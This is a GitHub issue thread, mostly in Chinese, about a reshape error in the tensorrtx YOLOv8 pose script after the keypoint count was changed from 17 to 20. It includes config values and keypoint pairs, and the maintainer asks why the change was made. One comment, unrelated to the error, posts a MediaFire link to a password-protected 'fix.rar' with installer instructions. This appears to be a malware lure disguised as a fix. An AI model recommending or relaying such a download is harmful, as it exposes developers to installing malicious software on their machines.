### ISSUE TITLE
POSE_NUM不等于17*3，等于20*3的话，运行yolov8_pose_trt.py报错，请问是什么问题？

### ISSUE THREAD

**Issue by linnaok** [wang-xinyu/tensorrtx#1569]
错误信息如下：
packages/numpy/core/fromnumeric.py", line 57, in _wrapfunc
    return bound(*args, **kwds)
ValueError: cannot reshape array of size 89000 into shape (98)

**Comment by linnaok** [comment]
设置成如下参数后，运行程序会自动kill：
CONF_THRESH = 0.5
IOU_THRESHOLD = 0.4
#POSE_NUM = 17 * 3
POSE_NUM = 20 * 3
DET_NUM = 6
#SEG_NUM = 32
SEG_NUM = 23

'''
keypoint_pairs = [
    (0, 1), (0, 2), (0, 5), (0, 6), (1, 2),
    (1, 3), (2, 4), (5, 6), (5, 7), (5, 11),
    (6, 8), (6, 12), (7, 9), (8, 10), (11, 12),
    (11, 13), (12, 14), (13, 15), (14, 16)
]

'''
keypoint_pairs = [(0,1), (0,2), (1,2), (0,3), (1,4),
                (2,17), (18,19),
                (5,9), (6,10), (7,11), (8,12),
                (9,13), (10,14), (11,15), (12,16)]

**Comment by linnaok** [comment]
可以成功转换成engine文件，但是运行yolov8_pose_trt.py报错

**Comment by 13a10D** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by wang-xinyu** [comment]
为什么要改POSE_NUM？
